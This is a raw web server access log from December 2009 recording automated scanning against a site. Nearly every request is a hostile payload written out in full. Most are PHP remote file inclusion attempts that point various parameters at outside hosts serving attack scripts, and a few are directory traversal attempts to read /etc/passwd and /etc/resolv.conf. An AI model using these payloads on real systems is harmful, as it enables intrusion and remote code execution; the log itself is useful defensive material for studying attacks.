216.18.20.210 - - [16/Dec/2009:07:06:08 -0600] "GET /index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:06:08 -0600] "GET /logs/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:06:08 -0600] "GET /logs/access_log.1253145600/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:06:08 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:14 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:14 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:14 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:43 -0600] "GET /logs/access_log.1231718400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:50 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:50 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:06:50 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:07:03 -0600] "GET /logs/access_log.1231718400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:07:54 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:08:38 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:21 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:21 -0600] "GET /logs/access_log.1250899200///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:22 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:30 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:30 -0600] "GET /logs/access_log.1250899200///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:32 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:49 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:49 -0600] "GET /logs/access_log.1251158400///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:10:51 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:10:54 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:10:54 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:10:54 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:01 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:01 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:01 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:02 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:02 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:02 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:02 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:04 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:11:05 -0600] "GET ///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:11:05 -0600] "GET /logs///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:11:05 -0600] "GET /logs/access_log.1255651200///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:11:05 -0600] "GET /logs/access_log.1256860800///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
94.23.18.102 - - [16/Dec/2009:07:11:11 -0600] "GET /logs/setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:07:11:11 -0600] "GET /setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
81.177.26.62 - - [16/Dec/2009:07:11:29 -0600] "GET /logs/access_log.1240272000%20%20///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:11:29 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:11:30 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:36 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:36 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:36 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:43 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:43 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:43 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:11:43 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:12:09 -0600] "GET /logs/access_log.1250985600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:12:13 -0600] "GET /logs/access_log.1250985600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.18.102 - - [16/Dec/2009:07:12:34 -0600] "GET /setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
121.125.67.213 - - [16/Dec/2009:07:12:37 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:37 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:37 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:37 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:38 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:41 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:50 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:50 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:50 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:56 -0600] "GET /index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:56 -0600] "GET /logs/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:56 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:12:56 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:07:13:11 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:13:48 -0600] "GET /index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:13:48 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:13:48 -0600] "GET /logs/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:07:14:22 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:07:16:55 -0600] "GET ///skin/ggambo4100_gallery/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:07:16:55 -0600] "GET /logs///skin/ggambo4100_gallery/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:07:16:55 -0600] "GET /logs/access_log.1249257600///skin/ggambo4100_gallery/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:18:36 -0600] "GET /logs/access_log.1230163200///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:18:38 -0600] "GET ///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:18:38 -0600] "GET /logs///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:20:13 -0600] "GET /logs/access_log.1230163200%20%20///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:07:20:21 -0600] "GET /logs/access_log.1240272000%20//components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 355 "-""-"
207.228.240.75 - - [16/Dec/2009:07:20:21 -0600] "GET /logs/access_log.1240272000%20//components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 355 "-""-"
207.228.240.75 - - [16/Dec/2009:07:20:22 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 332 "-""-"
207.228.240.75 - - [16/Dec/2009:07:20:22 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 332 "-""-"
202.88.229.100 - - [16/Dec/2009:07:20:42 -0600] "GET ///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:20:42 -0600] "GET /logs/access_log.1230163200///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:20:42 -0600] "GET /logs///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.55.106.206 - - [16/Dec/2009:07:21:10 -0600] "GET /logs/access_log.1133913600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.88.229.100 - - [16/Dec/2009:07:22:05 -0600] "GET /logs/access_log.1230163200%20%20///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
115.68.3.94 - - [16/Dec/2009:07:22:12 -0600] "GET /logs///skin/ggambo4100_gallery2/setup.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.68.3.94 - - [16/Dec/2009:07:22:12 -0600] "GET ///skin/ggambo4100_gallery2/setup.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.68.3.94 - - [16/Dec/2009:07:22:12 -0600] "GET /logs/access_log.1255824000///skin/ggambo4100_gallery2/setup.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.68.3.94 - - [16/Dec/2009:07:22:12 -0600] "GET /logs/access_log.1255737600///skin/ggambo4100_gallery2/setup.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
195.22.14.131 - - [16/Dec/2009:07:22:56 -0600] "GET /logs/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 296 "-""-"
195.22.14.131 - - [16/Dec/2009:07:22:56 -0600] "GET /logs/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 296 "-""-"
195.22.14.131 - - [16/Dec/2009:07:22:56 -0600] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 291 "-""-"
195.22.14.131 - - [16/Dec/2009:07:22:56 -0600] "GET /logs/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 296 "-""-"
195.22.14.131 - - [16/Dec/2009:07:22:57 -0600] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 291 "-""-"
195.22.14.131 - - [16/Dec/2009:07:22:57 -0600] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 291 "-""-"
202.88.229.100 - - [16/Dec/2009:07:23:13 -0600] "GET /logs/access_log.1237075200///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:32 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:23:32 -0600] "GET /logs/access_log.1236902400///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:33 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:39 -0600] "GET /logs/access_log.1246665600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:50 -0600] "GET /logs/access_log.1246665600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:50 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:23:52 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:00 -0600] "GET /logs/access_log.1252972800///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:20 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:20 -0600] "GET /logs/access_log.1230163200%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:20 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:25 -0600] "GET /logs/access_log.1246665600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:25 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:26 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:37 -0600] "GET /logs/access_log.1246665600///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:37 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:37 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:37 -0600] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:37 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:24:39 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:24:41 -0600] "GET /logs/access_log.1234224000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.106.115 - - [16/Dec/2009:07:25:07 -0600] "GET /logs/access_log.1215129600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.88.229.100 - - [16/Dec/2009:07:25:40 -0600] "GET /logs/access_log.1237075200///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:07:25:40 -0600] "GET /logs/access_log.1236902400///////lostpasswd.php?env[include_prefix]=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:26:08 -0600] "GET /logs/access_log.1240272000%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:07:26:21 -0600] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:07:26:21 -0600] "GET /logs/access_log.1249689600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:07:26:21 -0600] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:26:50 -0600] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:26:50 -0600] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:26:50 -0600] "GET /logs/access_log.1230163200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:07:26:59 -0600] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
